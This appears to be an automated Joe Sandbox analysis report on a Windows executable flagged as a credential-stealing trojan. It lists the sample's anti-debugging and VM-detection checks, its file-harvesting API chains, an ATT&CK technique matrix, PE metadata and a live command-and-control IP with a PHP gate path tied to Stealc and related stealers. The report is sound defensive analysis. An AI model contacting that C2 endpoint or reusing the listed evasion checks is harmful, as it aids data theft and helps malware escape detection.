                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F75FF second address: 6F7606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F9980 second address: 6F9984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FDBFD second address: 6FDC2A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC070F37E38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007FC070F37E5Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC070F37E48h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FDC2A second address: 6FDC2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FDE4F second address: 6FDE9A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FC070F37E49h 0x00000010 movsx edx, bx 0x00000013 pop edx 0x00000014 push 00000004h 0x00000016 mov edx, 431DCEE1h 0x0000001b push 730D5D21h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC070F37E44h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FE111 second address: 6FE139 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC070C1F30Ch 0x00000008 jo 00007FC070C1F306h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push dword ptr [ebp+122D23B2h] 0x00000019 sub edx, dword ptr [ebp+122D3342h] 0x0000001f push F7CD2BB2h 0x00000024 push edi 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FFB59 second address: 6FFB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC070F37E3Fh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FF6B7 second address: 6FF6BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 701737 second address: 701740 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50B056E second address: 50B05D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC070C1F30Bh 0x00000008 or ch, FFFFFFDEh 0x0000000b jmp 00007FC070C1F319h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 movzx ecx, di 0x00000019 mov edi, 733197ECh 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FC070C1F312h 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC070C1F317h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50B05D4 second address: 50B05DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50B05DA second address: 50B05DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50B05DE second address: 50B05F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC070F37E3Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50B05F4 second address: 50B0606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC070C1F30Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50B0606 second address: 50B060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 46DC0E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 60AB63 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 46B376 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 699E27 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-37721)
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0018E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00181710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0018F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00193B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00194B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0018DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0018EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0018BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0018DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00181160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1727662731.0000000001223000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
                Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1727662731.0000000001223000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36533)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36536)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36588)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36548)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36556)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36422)
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00184610 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00199BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00199AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00197690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6976, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00199790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001998E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle
                Source: file.exe | Binary or memory string: qProgram Manager
                Source: file.exe, 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: qProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C7588 cpuid
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00197D20 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00197B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001979E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00197BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.180000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1685626986.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6976, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.180000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1685626986.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6976, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Native API (12) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (334) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  unknown
                  http://185.215.113.206/true
                    unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php/c | file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpS | file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/_ | file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/Z | file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpk | file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php6 | file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206j | file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/4 | file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1546392
                                      Start date and time:2024-10-31 20:47:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 9s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 134
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated
                                      • VT rate limit hit for: file.exe
                                      No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                      No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
                                      No context
                                      No context
                                      No created / dropped files found
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.958956168907646
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:2'131'968 bytes
                                      MD5:508dc49e57681ea817bd36f9770ad609
                                      SHA1:d3cb94f703fa7549d47d9984393c34413bacb53f
                                      SHA256:bd37eb6db999d3f29ae806b66fb66d0f8e378b6b9169ecb9b7b7ed7308c0c7bf
                                      SHA512:5dca8c708215cddc174142685690b2335994990e14ab85f96dc8ba0279922dde2d0b85adf75a486d4ebe522403b9aa4cfd540d9be5f247b75d9a1dd6f22814b7
                                      SSDEEP:49152:bToLXXjGK8NYlw/xfL5tDm5myyEdDk1KrDmkVtg7v8UW/zN:fOaz3xf9ZyygrDlVtC8LL
                                      TLSH:40A533D618B8BB7CF35D8478C1AF8E817B78D6E431B87855A1BCA125907EE608C7DD08
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0xb2a000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                      Instruction
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | c9de7d5a05b197335af4beecae47c838 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x2a1000 | 0x200 | 72b96ae7e5a5fdf85d4980358fb6c021 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
